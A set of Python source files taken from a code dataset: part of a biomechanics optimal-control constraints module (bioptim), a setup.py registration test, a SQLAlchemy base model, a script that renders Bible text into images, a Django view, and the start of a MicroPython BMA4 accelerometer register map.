vertcat(\n mu_squared * normal_contact_force_squared - tangential_contact_force_squared,\n mu_squared * normal_contact_force_squared + tangential_contact_force_squared,\n )\n return slipping\n\n @staticmethod\n def torque_max_from_q_and_qdot(constraint: Constraint, all_pn: PenaltyNodeList, min_torque=None):\n \"\"\"\n Non-linear maximal values of joint torques computed from the torque-position-velocity relationship\n\n Parameters\n ----------\n constraint: Constraint\n The actual constraint to declare\n all_pn: PenaltyNodeList\n The penalty node elements\n min_torque: float\n Minimum joint torques. 
This prevents the torques from being too small, but introduces an if statement\n \"\"\"\n\n nlp = all_pn.nlp\n if min_torque and min_torque < 0:\n raise ValueError(\"min_torque cannot be negative in tau_max_from_actuators\")\n\n bound = nlp.model.torqueMax(nlp.states[\"q\"].mx, nlp.states[\"qdot\"].mx)\n min_bound = BiorbdInterface.mx_to_cx(\n \"min_bound\",\n nlp.controls[\"tau\"].mapping.to_first.map(bound[1].to_mx()),\n nlp.states[\"q\"],\n nlp.states[\"qdot\"],\n )\n max_bound = BiorbdInterface.mx_to_cx(\n \"max_bound\",\n nlp.controls[\"tau\"].mapping.to_first.map(bound[0].to_mx()),\n nlp.states[\"q\"],\n nlp.states[\"qdot\"],\n )\n if min_torque:\n min_bound = if_else(lt(min_bound, min_torque), min_torque, min_bound)\n max_bound = if_else(lt(max_bound, min_torque), min_torque, max_bound)\n\n value = vertcat(nlp.controls[\"tau\"].cx + min_bound, nlp.controls[\"tau\"].cx - max_bound)\n\n n_rows = constraint.rows if constraint.rows else int(value.shape[0] / 2)\n constraint.min_bound = [0] * n_rows + [-np.inf] * n_rows\n constraint.max_bound = [np.inf] * n_rows + [0] * n_rows\n return value\n\n @staticmethod\n def time_constraint(_: Constraint, all_pn: PenaltyNodeList, **unused_param):\n \"\"\"\n The time constraint is taken care of elsewhere, but must be declared here. This function therefore does nothing\n\n Parameters\n ----------\n _: Constraint\n The actual constraint to declare\n all_pn: PenaltyNodeList\n The penalty node elements\n **unused_param: dict\n Since the function does nothing, we can safely ignore any argument\n \"\"\"\n\n return all_pn.nlp.tf\n\n @staticmethod\n def qddot_equals_forward_dynamics(_: Constraint, all_pn: PenaltyNodeList, with_contact: bool, **unused_param):\n \"\"\"\n Compute the difference between symbolic joint accelerations and forward dynamic results\n It includes the inversion of the mass matrix\n\n Parameters\n ----------\n _: Constraint\n The actual constraint to declare\n all_pn: PenaltyNodeList\n The penalty node elements\n with_contact: bool\n True if the contact dynamics is handled\n **unused_param: dict\n Since the function does nothing, we can safely ignore any argument\n \"\"\"\n\n nlp = all_pn.nlp\n q = nlp.states[\"q\"].mx\n qdot = nlp.states[\"qdot\"].mx\n tau = nlp.states[\"tau\"].mx if \"tau\" in nlp.states.keys() else nlp.controls[\"tau\"].mx\n\n qddot = nlp.controls[\"qddot\"].mx if \"qddot\" in nlp.controls.keys() else nlp.states[\"qddot\"].mx\n if with_contact:\n model = biorbd.Model(\n nlp.model.path().absolutePath().to_string()\n ) # TODO: find a better solution if possible\n qddot_fd = model.ForwardDynamicsConstraintsDirect(q, qdot, tau).to_mx()\n else:\n qddot_fd = nlp.model.ForwardDynamics(q, qdot, tau).to_mx()\n\n var = []\n var.extend([nlp.states[key] for key in nlp.states])\n var.extend([nlp.controls[key] for key in nlp.controls])\n var.extend([param for param in nlp.parameters])\n\n return BiorbdInterface.mx_to_cx(\"ForwardDynamics\", qddot - qddot_fd, *var)\n\n @staticmethod\n def tau_equals_inverse_dynamics(_: Constraint, all_pn: PenaltyNodeList, with_contact: bool, **unused_param):\n \"\"\"\n Compute the difference between symbolic joint torques and inverse dynamic results\n It does not include any inversion of the mass matrix\n\n Parameters\n ----------\n _: Constraint\n The actual constraint to declare\n all_pn: PenaltyNodeList\n The penalty node elements\n with_contact: bool\n True if the contact dynamics is handled\n **unused_param: dict\n Since the function does nothing, we can safely ignore any argument\n \"\"\"\n\n nlp = 
all_pn.nlp\n q = nlp.states[\"q\"].mx\n qdot = nlp.states[\"qdot\"].mx\n tau = nlp.states[\"tau\"].mx if \"tau\" in nlp.states.keys() else nlp.controls[\"tau\"].mx\n qddot = nlp.states[\"qddot\"].mx if \"qddot\" in nlp.states.keys() else nlp.controls[\"qddot\"].mx\n\n if nlp.external_forces:\n raise NotImplementedError(\n \"This implicit constraint tau_equals_inverse_dynamics is not implemented yet with external forces\"\n )\n # Todo: add fext tau_id = nlp.model.InverseDynamics(q, qdot, qddot, fext).to_mx()\n if with_contact:\n f_contact = nlp.controls[\"fext\"].mx if \"fext\" in nlp.controls.keys() else nlp.states[\"fext\"].mx\n count = 0\n f_contact_vec = biorbd.VecBiorbdVector()\n for ii in range(nlp.model.nbRigidContacts()):\n n_f_contact = len(nlp.model.rigidContactAxisIdx(ii))\n idx = [i + count for i in range(n_f_contact)]\n f_contact_vec.append(f_contact[idx])\n count = count + n_f_contact\n\n tau_id = nlp.model.InverseDynamics(q, qdot, qddot, None, f_contact_vec).to_mx()\n\n else:\n tau_id = nlp.model.InverseDynamics(q, qdot, qddot).to_mx()\n\n var = []\n var.extend([nlp.states[key] for key in nlp.states])\n var.extend([nlp.controls[key] for key in nlp.controls])\n var.extend([param for param in nlp.parameters])\n\n return BiorbdInterface.mx_to_cx(\"InverseDynamics\", tau_id - tau, *var)\n\n @staticmethod\n def implicit_marker_acceleration(_: Constraint, all_pn: PenaltyNodeList, contact_index: int, **unused_param):\n \"\"\"\n Compute the acceleration of the contact node to set it at zero\n\n Parameters\n ----------\n _: Constraint\n The actual constraint to declare\n all_pn: PenaltyNodeList\n The penalty node elements\n contact_index: int\n The contact index\n **unused_param: dict\n Since the function does nothing, we can safely ignore any argument\n \"\"\"\n\n nlp = all_pn.nlp\n q = nlp.states[\"q\"].mx\n qdot = nlp.states[\"qdot\"].mx\n qddot = nlp.states[\"qddot\"].mx if \"qddot\" in nlp.states.keys() else nlp.controls[\"qddot\"].mx\n\n # TODO get the index of the marker\n contact_name = nlp.model.contactNames()[contact_index].to_string()\n if \"_X\" in nlp.model.contactNames()[contact_index].to_string():\n idx_dir = 0\n elif \"_Y\" in nlp.model.contactNames()[contact_index].to_string():\n idx_dir = 1\n elif \"_Z\" in nlp.model.contactNames()[contact_index].to_string():\n idx_dir = 2\n contact_acceleration = nlp.model.rigidContactAcceleration(q, qdot, qddot, 0).to_mx()[idx_dir]\n\n var = []\n var.extend([nlp.states[key] for key in nlp.states])\n var.extend([nlp.controls[key] for key in nlp.controls])\n var.extend([nlp.parameters[key] for key in nlp.parameters])\n\n return BiorbdInterface.mx_to_cx(\"contact_acceleration\", contact_acceleration, *var)\n\n @staticmethod\n def tau_from_muscle_equal_inverse_dynamics(_: Constraint, all_pn: PenaltyNodeList, **unused_param):\n \"\"\"\n Compute the difference between symbolic joint torques from muscle and inverse dynamic results\n It does not include any inversion of mass matrix\n\n Parameters\n ----------\n _: Constraint\n The actual constraint to declare\n all_pn: PenaltyNodeList\n The penalty node elements\n **unused_param: dict\n Since the function does nothing, we can safely ignore any argument\n \"\"\"\n\n nlp = all_pn.nlp\n q = nlp.states[\"q\"].mx\n qdot = nlp.states[\"qdot\"].mx\n muscle_activations = nlp.controls[\"muscles\"].mx\n muscles_states = nlp.model.stateSet()\n for k in range(len(nlp.controls[\"muscles\"])):\n muscles_states[k].setActivation(muscle_activations[k])\n muscle_tau = 
nlp.model.muscularJointTorque(muscles_states, q, qdot).to_mx()\n qddot = nlp.states[\"qddot\"].mx if \"qddot\" in nlp.states.keys() else nlp.controls[\"qddot\"].mx\n\n if nlp.external_forces:\n raise NotImplementedError(\n \"This implicit constraint tau_from_muscle_equal_inverse_dynamics is not implemented yet with external forces\"\n )\n # Todo: add fext tau_id = nlp.model.InverseDynamics(q, qdot, qddot, fext).to_mx()\n # fext need to be a mx\n\n tau_id = nlp.model.InverseDynamics(q, qdot, qddot).to_mx()\n\n var = []\n var.extend([nlp.states[key] for key in nlp.states])\n var.extend([nlp.controls[key] for key in nlp.controls])\n var.extend([param for param in nlp.parameters])\n\n return BiorbdInterface.mx_to_cx(\"InverseDynamics\", tau_id - muscle_tau, *var)\n\n @staticmethod\n def implicit_soft_contact_forces(_: Constraint, all_pn: PenaltyNodeList, **unused_param):\n \"\"\"\n Compute the difference between symbolic soft contact forces and actual force contact dynamic\n\n Parameters\n ----------\n _: Constraint\n The actual constraint to declare\n all_pn: PenaltyNodeList\n The penalty node elements\n **unused_param: dict\n Since the function does nothing, we can safely ignore any argument\n \"\"\"\n\n nlp = all_pn.nlp\n\n force_idx = []\n for i_sc in range(nlp.model.nbSoftContacts()):\n force_idx.append(3 + (6 * i_sc))\n force_idx.append(4 + (6 * i_sc))\n force_idx.append(5 + (6 * i_sc))\n\n soft_contact_all = nlp.soft_contact_forces_func(nlp.states.mx, nlp.controls.mx, nlp.parameters.mx)\n soft_contact_force = soft_contact_all[force_idx]\n\n var = []\n var.extend([nlp.states[key] for key in nlp.states])\n var.extend([nlp.controls[key] for key in nlp.controls])\n var.extend([param for param in nlp.parameters])\n\n return BiorbdInterface.mx_to_cx(\"ForwardDynamics\", nlp.controls[\"fext\"].mx - soft_contact_force, *var)\n\n @staticmethod\n def inner_phase_continuity(ocp):\n \"\"\"\n Add continuity constraints between each nodes of a phase.\n\n Parameters\n ----------\n ocp: OptimalControlProgram\n A reference to the ocp\n \"\"\"\n\n # Dynamics must be sound within phases\n for nlp in ocp.nlp:\n penalty = Constraint(ConstraintFcn.CONTINUITY, node=Node.ALL_SHOOTING, penalty_type=PenaltyType.INTERNAL)\n penalty.add_or_replace_to_penalty_pool(ocp, nlp)\n\n @staticmethod\n def inter_phase_continuity(ocp):\n \"\"\"\n Add phase transition constraints between two phases.\n\n Parameters\n ----------\n ocp: OptimalControlProgram\n A reference to the ocp\n \"\"\"\n from ..limits.phase_transition import PhaseTransitionFcn\n\n for pt in ocp.phase_transitions:\n if pt.type == PhaseTransitionFcn.DISCONTINUOUS:\n continue\n # Dynamics must be respected between phases\n pt.name = f\"PHASE_TRANSITION {pt.phase_pre_idx}->{pt.phase_post_idx}\"\n pt.list_index = -1\n pt.add_or_replace_to_penalty_pool(ocp, ocp.nlp[pt.phase_pre_idx])\n\n @staticmethod\n def node_equalities(ocp):\n \"\"\"\n Add multi node constraints between chosen phases.\n\n Parameters\n ----------\n ocp: OptimalControlProgram\n A reference to the ocp\n \"\"\"\n for mnc in ocp.multinode_constraints:\n # Equality constraint between nodes\n first_node_name = f\"idx {str(mnc.first_node)}\" if isinstance(mnc.first_node, int) else mnc.first_node.name\n second_node_name = (\n f\"idx {str(mnc.second_node)}\" if isinstance(mnc.second_node, int) else mnc.second_node.name\n )\n mnc.name = (\n f\"NODE_EQUALITY \"\n f\"Phase {mnc.phase_first_idx} Node {first_node_name}\"\n f\"->Phase {mnc.phase_second_idx} Node {second_node_name}\"\n )\n mnc.list_index = 
-1\n mnc.add_or_replace_to_penalty_pool(ocp, ocp.nlp[mnc.phase_first_idx])\n\n @staticmethod\n def get_dt(_):\n return 1\n\n @staticmethod\n def penalty_nature() -> str:\n return \"constraints\"\n\n\nclass ConstraintFcn(FcnEnum):\n \"\"\"\n Selection of valid constraint functions\n\n Methods\n -------\n def get_type() -> Callable\n Returns the type of the penalty\n \"\"\"\n\n CONTINUITY = (PenaltyFunctionAbstract.Functions.continuity,)\n TRACK_CONTROL = (PenaltyFunctionAbstract.Functions.minimize_controls,)\n TRACK_STATE = (PenaltyFunctionAbstract.Functions.minimize_states,)\n TRACK_QDDOT = (PenaltyFunctionAbstract.Functions.minimize_qddot,)\n TRACK_MARKERS = (PenaltyFunctionAbstract.Functions.minimize_markers,)\n TRACK_MARKERS_VELOCITY = (PenaltyFunctionAbstract.Functions.minimize_markers_velocity,)\n SUPERIMPOSE_MARKERS = (PenaltyFunctionAbstract.Functions.superimpose_markers,)\n PROPORTIONAL_STATE = (PenaltyFunctionAbstract.Functions.proportional_states,)\n PROPORTIONAL_CONTROL = (PenaltyFunctionAbstract.Functions.proportional_controls,)\n TRACK_CONTACT_FORCES = (PenaltyFunctionAbstract.Functions.minimize_contact_forces,)\n TRACK_SEGMENT_WITH_CUSTOM_RT = (PenaltyFunctionAbstract.Functions.track_segment_with_custom_rt,)\n TRACK_MARKER_WITH_SEGMENT_AXIS = (PenaltyFunctionAbstract.Functions.track_marker_with_segment_axis,)\n TRACK_COM_POSITION = (PenaltyFunctionAbstract.Functions.minimize_com_position,)\n TRACK_COM_VELOCITY = (PenaltyFunctionAbstract.Functions.minimize_com_velocity,)\n TRACK_ANGULAR_MOMENTUM = (PenaltyFunctionAbstract.Functions.minimize_angular_momentum,)\n TRACK_LINEAR_MOMENTUM = (PenaltyFunctionAbstract.Functions.minimize_linear_momentum,)\n CUSTOM = (PenaltyFunctionAbstract.Functions.custom,)\n NON_SLIPPING = (ConstraintFunction.Functions.non_slipping,)\n TORQUE_MAX_FROM_Q_AND_QDOT = (ConstraintFunction.Functions.torque_max_from_q_and_qdot,)\n TIME_CONSTRAINT = (ConstraintFunction.Functions.time_constraint,)\n\n @staticmethod\n def get_type():\n \"\"\"\n Returns the type of the penalty\n \"\"\"\n\n return ConstraintFunction\n\n\nclass ImplicitConstraintFcn(FcnEnum):\n \"\"\"\n Selection of valid constraint functions\n\n Methods\n -------\n def get_type() -> Callable\n Returns the type of the penalty\n \"\"\"\n\n QDDOT_EQUALS_FORWARD_DYNAMICS = (ConstraintFunction.Functions.qddot_equals_forward_dynamics,)\n TAU_EQUALS_INVERSE_DYNAMICS = (ConstraintFunction.Functions.tau_equals_inverse_dynamics,)\n SOFT_CONTACTS_EQUALS_SOFT_CONTACTS_DYNAMICS = (ConstraintFunction.Functions.implicit_soft_contact_forces,)\n CONTACT_ACCELERATION_EQUALS_ZERO = (ConstraintFunction.Functions.implicit_marker_acceleration,)\n TAU_FROM_MUSCLE_EQUAL_INVERSE_DYNAMICS = (ConstraintFunction.Functions.tau_from_muscle_equal_inverse_dynamics,)\n\n @staticmethod\n def get_type():\n \"\"\"\n Returns the type of the penalty\n \"\"\"\n\n return ConstraintFunction\n\n\nclass ContinuityConstraintFunctions:\n \"\"\"\n Interface between continuity and constraint\n \"\"\"\n\n @staticmethod\n def continuity(ocp):\n \"\"\"\n The declaration of inner- and inter-phase continuity constraints\n\n Parameters\n ----------\n ocp: OptimalControlProgram\n A reference to the ocp\n \"\"\"\n\n ConstraintFunction.inner_phase_continuity(ocp)\n\n # Dynamics must be respected between phases\n ConstraintFunction.inter_phase_continuity(ocp)\n\n if ocp.multinode_constraints: # TODO: they shouldn't be added here\n 
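# Declared last, after the per-phase continuity and the phase-transition constraints above have been added.\n 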
ConstraintFunction.node_equalities(ocp)\n","sub_path":"bioptim/limits/constraints.py","file_name":"constraints.py","file_ext":"py","file_size_in_byte":27563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"371940299","text":"from pathlib import Path\nimport re\n\nimport pytest\n\n\ndef test_setup_has_all_kernel_subpkgs():\n root = Path(__file__).parent.parent\n setup_py_content = (root / 'setup.py').read_text()\n for subpkg in (root / 'ai' / 'backend' / 'kernel').iterdir():\n if subpkg.is_dir() and subpkg.name != '__pycache__':\n rx = r\"^\\s+'ai\\.backend\\.kernel.{0}'\".format(subpkg.name)\n m = re.search(rx, setup_py_content, re.M)\n if m is None:\n pytest.fail(f'Kernel subpackage \"{subpkg.name}\" '\n 'is not registered to setup.py!!')\n","sub_path":"tests/test_setup.py","file_name":"test_setup.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"292168486","text":"from app.utils import db\nfrom sqlalchemy import exc\nfrom datetime import datetime\nfrom app.utils import convert_to_camel_case\n\nclass BaseModel(db.Model):\n __abstract__ = True\n\n id = db.Column(db.Integer(), primary_key=True)\n is_deleted = db.Column(db.Boolean, default=False, nullable=False)\n # pass the callable (not its result) so the timestamp is computed per row, not once at import time\n created_at = db.Column(db.DateTime(), default=datetime.now)\n updated_at = db.Column(db.DateTime(), default=datetime.now, onupdate=datetime.now)\n\n\n def save(self):\n try:\n db.session.add(self)\n db.session.commit()\n except (exc.IntegrityError, exc.InvalidRequestError):\n db.session().rollback()\n\n def delete(self):\n db.session.delete(self)\n db.session.commit()\n\n def serialize(self):\n serialized = {\n convert_to_camel_case(column.name): getattr(self, column.name) for column in self.__table__.columns if column.name not in ['created_at', 'updated_at']\n }\n return serialized\n","sub_path":"api/app/models/base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"53431643","text":"import math\nimport sys\nsys.path.append(\"./\")\n\nimport numpy as np\nfrom PIL import Image, ImageFont, ImageDraw\n\nfrom utils.kjv_text import KJVTextDataset\n\nkjv = KJVTextDataset()\n\n# Derived from code at\n# https://nicholastsmith.wordpress.com/2017/10/14/deep-learning-ocr-using-tensorflow-and-python/\ndef makeImage(txt, font, filename, sz):\n img = Image.new('RGB', sz, \"white\")\n draw = ImageDraw.Draw(img)\n draw.text((0,0), txt, (0, 0, 0), font=font)\n img.save(filename)\n\nfont_size_in = 0.25\nfont_size_pt = int(font_size_in * 72.0)\nfont_path = \"utils/Andale-Mono.ttf\" # Specific to Mac OS -- change if needed\nfont = ImageFont.truetype(font_path, font_size_pt)\n# note: PIL's font.getsize() returns (width, height)\nchar_width, char_height = font.getsize(\"A\")[0:2]\n\nchars_per_line = 32\nlines_per_img = 32\nimage_dims_px = (char_width * chars_per_line, (font_size_pt + 3) * lines_per_img)\n\nprint(\"Image dimensions: (%d px x %d px)\" % (image_dims_px[0], image_dims_px[1]))\n\ntext_str_per_image = kjv.image_text(chars_per_line, lines_per_img)\nnum_imgs = len(text_str_per_image)\nprint(\"Creating %d images...\" % num_imgs)\nfor i in range(num_imgs):\n # Print update in place\n sys.stdout.write(\"\\r%d images processed (%d%% complete)\" % (i, int(i / float(num_imgs / 100.0))))\n sys.stdout.flush()\n\n txt = text_str_per_image[i].rstrip('\\n') # Strip off last newline for each image; Pillow doesn't like 
that...\n img_filename = \"images/%d.png\" % i\n makeImage(txt, font, img_filename, image_dims_px)\n# Insert newline to reset in-place update timer\nsys.stdout.write(\"\\r\\nImage creation complete!\\n\")\nsys.stdout.flush()\n","sub_path":"scripts/generate_images.py","file_name":"generate_images.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"65180222","text":"from django.views import generic\nfrom django.http import JsonResponse\nfrom django.shortcuts import render, redirect\n\nfrom transfers.constants import TransferType\nfrom transfers.models import PS2TSTransfer, TS2PSTransfer\nfrom transfers.utils import fetch_ps2ts_list, fetch_ts2ps_list\n\nclass AssocDeanHomeView(generic.TemplateView):\n def get(self, request, *args, **kwargs): \n return render(request,\"transfers/ad_home.html\")\n\nclass AssocDeanLisApplicationstView(generic.ListView):\n def get(self, request, *args, **kwargs):\n if 'type' not in kwargs:\n type_of_request = None\n return redirect('/TMS/assoc-dean/home/')\n else:\n type_of_request = kwargs[\"type\"]\n if int(type_of_request) == TransferType.PS2TS.value:\n return_list = fetch_ps2ts_list()\n elif int(type_of_request) == TransferType.TS2PS.value:\n return_list = fetch_ts2ps_list()\n else:\n return_list = []\n return JsonResponse(return_list, safe=False)\n","sub_path":"transfers/views/assoc_dean_views.py","file_name":"assoc_dean_views.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"318608849","text":"#\n#\tThis python code is based on code found in bma4.h and bma4.c by bosch: see copyright notice in bma4.h\n# The python coded that i added is under MIT licence (see license file) - franz schaefer schaefer@mond.at\n#\nfrom micropython import const\nimport time\nfrom ustruct import unpack\n\n\nBMA4_CHIP_ID_ADDR\t\t = const(0x00)\nBMA4_ERROR_ADDR\t\t= const(0x02)\nBMA4_STATUS_ADDR\t= const(0x03)\n\n# AUX/ACCEL DATA BASE ADDRESS REGISTERS \nBMA4_DATA_0_ADDR\t= const(0x0A)\nBMA4_DATA_8_ADDR\t= const(0x12)\n\n# SENSOR TIME REGISTERS\nBMA4_SENSORTIME_0_ADDR\t= const(0x18)\n\n# INTERRUPT/FEATURE STATUS REGISTERS\nBMA4_INT_STAT_0_ADDR\t= const(0x1C)\n\n# INTERRUPT/FEATURE STATUS REGISTERS\nBMA4_INT_STAT_1_ADDR\t= const(0x1D)\n\n# TEMPERATURE REGISTERS\nBMA4_TEMPERATURE_ADDR\t= const(0x22)\n\n# FIFO REGISTERS\nBMA4_FIFO_LENGTH_0_ADDR\t\t= const(0x24)\nBMA4_FIFO_DATA_ADDR\t\t\t= const(0x26)\n\n# ACCEL CONFIG REGISTERS\nBMA4_ACCEL_CONFIG_ADDR\t\t= const(0x40)\n\n# ACCEL RANGE ADDRESS\nBMA4_ACCEL_RANGE_ADDR\t\t= const(0x41)\n\n# AUX CONFIG REGISTERS\nBMA4_AUX_CONFIG_ADDR\t\t= const(0x44)\n\n# FIFO DOWN SAMPLING REGISTER ADDRESS FOR ACCEL\nBMA4_FIFO_DOWN_ADDR\t\t\t= const(0x45)\n\n# FIFO WATERMARK REGISTER ADDRESS\nBMA4_FIFO_WTM_0_ADDR\t\t= const(0x46)\n\n# FIFO CONFIG REGISTERS\nBMA4_FIFO_CONFIG_0_ADDR\t\t= const(0x48)\nBMA4_FIFO_CONFIG_1_ADDR\t\t= const(0x49)\n\n# MAG INTERFACE REGISTERS\nBMA4_AUX_DEV_ID_ADDR\t\t= const(0x4B)\nBMA4_AUX_IF_CONF_ADDR\t\t= const(0x4C)\nBMA4_AUX_RD_ADDR\t\t\t= const(0x4D)\nBMA4_AUX_WR_ADDR\t\t\t= const(0x4E)\nBMA4_AUX_WR_DATA_ADDR\t\t= const(0x4F)\n\n# INTERRUPT ENABLE REGISTERS\nBMA4_INT1_IO_CTRL_ADDR\t\t= const(0x53)\nBMA4_INT2_IO_CTRL_ADDR\t\t= const(0x54)\n\n# LATCH DURATION REGISTERS\nBMA4_INTR_LATCH_ADDR\t\t= const(0x55)\n\n# MAP INTERRUPT 1 and 2 REGISTERS\nBMA4_INT_MAP_1_ADDR\t\t\t= const(0x56)\nBMA4_INT_MAP_2_ADDR\t\t\t= 
const(0x57)\nBMA4_INT_MAP_DATA_ADDR\t\t= const(0x58)\nBMA4_INIT_CTRL_ADDR\t\t\t= const(0x59)\n\n# FEATURE CONFIG RELATED \nBMA4_RESERVED_REG_5B_ADDR\t\t= const(0x5B)\nBMA4_RESERVED_REG_5C_ADDR\t\t= const(0x5C)\nBMA4_FEATURE_CONFIG_ADDR\t\t= const(0x5E)\nBMA4_INTERNAL_ERROR\t\t\t= const(0x5F)\n\n# SERIAL INTERFACE SETTINGS REGISTER\nBMA4_IF_CONFIG_ADDR\t\t= const(0x6B)\n\n# SELF_TEST REGISTER\nBMA4_ACC_SELF_TEST_ADDR\t= const(0x6D)\n\n# SPI,I2C SELECTION REGISTER\nBMA4_NV_CONFIG_ADDR\t\t= const(0x70)\n\n# ACCEL OFFSET REGISTERS\nBMA4_OFFSET_0_ADDR\t\t= const(0x71)\nBMA4_OFFSET_1_ADDR\t\t= const(0x72)\nBMA4_OFFSET_2_ADDR\t\t= const(0x73)\n\n# POWER_CTRL REGISTER\nBMA4_POWER_CONF_ADDR\t= const(0x7C)\nBMA4_POWER_CTRL_ADDR\t= const(0x7D)\n\n# COMMAND REGISTER\nBMA4_CMD_ADDR\t\t= const(0x7E)\n\n# GPIO REGISTERS\nBMA4_STEP_CNT_OUT_0_ADDR\t= const(0x1E)\nBMA4_HIGH_G_OUT_ADDR\t\t= const(0x1F)\nBMA4_ACTIVITY_OUT_ADDR\t\t= const(0x27)\nBMA4_ORIENTATION_OUT_ADDR\t= const(0x28)\nBMA4_INTERNAL_STAT\t\t\t= const(0x2A)\n\nBMA4_BLOCK_SIZE\t\t\t= const(32)\n\n# I2C slave address \nBMA4_I2C_ADDR_PRIMARY\t= const(0x18)\nBMA4_I2C_ADDR_SECONDARY\t= const(0x19)\nBMA4_I2C_BMM150_ADDR = const(0x10)\n\n# Interface selection macro \nBMA4_SPI_INTERFACE\t\t= const(1)\nBMA4_I2C_INTERFACE\t\t= const(2)\n\n# Interface selection macro \nBMA4_SPI_WR_MASK\t\t= const(0x7F)\nBMA4_SPI_RD_MASK\t\t= const(0x80)\n\n# Auxiliary sensor selection macro \nBMM150_SENSOR\t\t\t= const(1)\nAKM9916_SENSOR\t\t\t= const(2)\nBMA4_ASIC_INITIALIZED\t\t= const(0x01)\n\n# Auxiliary sensor chip id macros \nBMM150_CHIP_ID = const(0x32)\n\n# Auxiliary sensor other macros \nBMM150_POWER_CONTROL_REG = const(0x4B)\nBMM150_POWER_MODE_REG\t\t\t= const(0x4C)\n\n# \tCONSTANTS \nBMA4_FIFO_CONFIG_LENGTH\t\t= const(2)\nBMA4_ACCEL_CONFIG_LENGTH\t= const(2)\nBMA4_FIFO_WM_LENGTH\t\t\t= const(2)\nBMA4_CONFIG_STREAM_SIZE\t\t= const(6144)\nBMA4_NON_LATCH_MODE\t\t\t= const(0)\nBMA4_LATCH_MODE\t\t\t\t= const(1)\nBMA4_OPEN_DRAIN\t\t\t\t= const(1)\nBMA4_PUSH_PULL\t\t\t\t= const(0)\nBMA4_ACTIVE_HIGH\t\t\t= const(1)\nBMA4_ACTIVE_LOW\t\t\t\t= const(0)\nBMA4_EDGE_TRIGGER\t\t\t= const(1)\nBMA4_LEVEL_TRIGGER\t\t\t= const(0)\nBMA4_OUTPUT_ENABLE\t\t\t= const(1)\nBMA4_OUTPUT_DISABLE\t\t\t= const(0)\nBMA4_INPUT_ENABLE\t\t\t= const(1)\nBMA4_INPUT_DISABLE\t\t\t= const(0)\n\n# ACCEL RANGE CHECK\nBMA4_ACCEL_RANGE_2G\t\t= const(0)\nBMA4_ACCEL_RANGE_4G\t\t= const(1)\nBMA4_ACCEL_RANGE_8G\t\t= const(2)\nBMA4_ACCEL_RANGE_16G\t= const(3)\n\n# CONDITION CHECK FOR READING AND WRTING DATA\nBMA4_MAX_VALUE_FIFO_FILTER\t\t= const(1)\nBMA4_MAX_VALUE_SPI3\t\t\t\t= const(1)\nBMA4_MAX_VALUE_SELFTEST_AMP\t\t= const(1)\nBMA4_MAX_IF_MODE\t\t\t\t= const(3)\nBMA4_MAX_VALUE_SELFTEST_SIGN\t= const(1)\n\n# BUS READ AND WRITE LENGTH FOR MAG & ACCEL\nBMA4_MAG_TRIM_DATA_SIZE\t\t= const(16)\nBMA4_MAG_XYZ_DATA_LENGTH\t= const(6)\nBMA4_MAG_XYZR_DATA_LENGTH\t= const(8)\nBMA4_ACCEL_DATA_LENGTH\t\t= const(6)\nBMA4_FIFO_DATA_LENGTH\t\t= const(2)\nBMA4_TEMP_DATA_SIZE\t\t\t= const(1)\n\n# TEMPERATURE CONSTANT \nBMA4_OFFSET_TEMP\t\t= const(23)\nBMA4_DEG\t\t\t= const(1)\nBMA4_FAHREN\t\t\t= const(2)\nBMA4_KELVIN\t\t\t= const(3)\n\n# DELAY DEFINITION IN MSEC\nBMA4_AUX_IF_DELAY\t\t\t= const(5)\nBMA4_BMM150_WAKEUP_DELAY1\t= const(2)\nBMA4_BMM150_WAKEUP_DELAY2\t= const(3)\nBMA4_BMM150_WAKEUP_DELAY3\t= const(1)\nBMA4_GEN_READ_WRITE_DELAY\t= const(1)\nBMA4_AUX_COM_DELAY\t\t\t= const(10)\n\n# \tARRAY PARAMETER DEFINITIONS\nBMA4_SENSOR_TIME_MSB_BYTE\t= const(2)\nBMA4_SENSOR_TIME_XLSB_BYTE\t= 
const(1)\nBMA4_SENSOR_TIME_LSB_BYTE\t= const(0)\nBMA4_MAG_X_LSB_BYTE\t\t\t= const(0)\nBMA4_MAG_X_MSB_BYTE\t\t\t= const(1)\nBMA4_MAG_Y_LSB_BYTE\t\t\t= const(2)\nBMA4_MAG_Y_MSB_BYTE\t\t\t= const(3)\nBMA4_MAG_Z_LSB_BYTE\t\t\t= const(4)\nBMA4_MAG_Z_MSB_BYTE\t\t\t= const(5)\nBMA4_MAG_R_LSB_BYTE\t\t\t= const(6)\nBMA4_MAG_R_MSB_BYTE\t\t\t= const(7)\nBMA4_TEMP_BYTE\t\t\t\t= const(0)\nBMA4_FIFO_LENGTH_MSB_BYTE\t= const(1)\n\n# \tERROR CODES\t\nBMA4_OK\t\t\t\t= const(0)\nBMA4_E_NULL_PTR\t\t\t= const(1)\nBMA4_E_OUT_OF_RANGE\t\t= const(1 << 1)\nBMA4_E_INVALID_SENSOR\t\t= const(1 << 2)\nBMA4_E_CONFIG_STREAM_ERROR\t= const(1 << 3)\nBMA4_E_SELF_TEST_FAIL\t\t= const(1 << 4)\nBMA4_E_FOC_FAIL\t\t\t= const(1 << 5)\nBMA4_E_FAIL\t\t\t= const(1 << 6)\nBMA4_E_INT_LINE_INVALID\t\t= const(1 << 7)\nBMA4_E_RD_WR_LENGTH_INVALID\t= const(1 << 8)\nBMA4_E_AUX_CONFIG_FAIL\t\t= const(1 << 9)\nBMA4_E_SC_FIFO_HEADER_ERR\t= const(1 << 10)\nBMA4_E_SC_FIFO_CONFIG_ERR\t= const(1 << 11)\n\n# \tUTILITY MACROS\t\nBMA4_SET_LOW_BYTE\t\t\t= const(0x00FF)\nBMA4_SET_HIGH_BYTE\t\t\t= const(0xFF00)\nBMA4_SET_LOW_NIBBLE\t\t\t= const(0x0F)\n\n# \tFOC RELATED MACROS\t\nBMA4_ACCEL_CONFIG_FOC\t\t= const(0xB7)\n\n\nBMA42X_ST_ACC_X_AXIS_SIGNAL_DIFF\t= 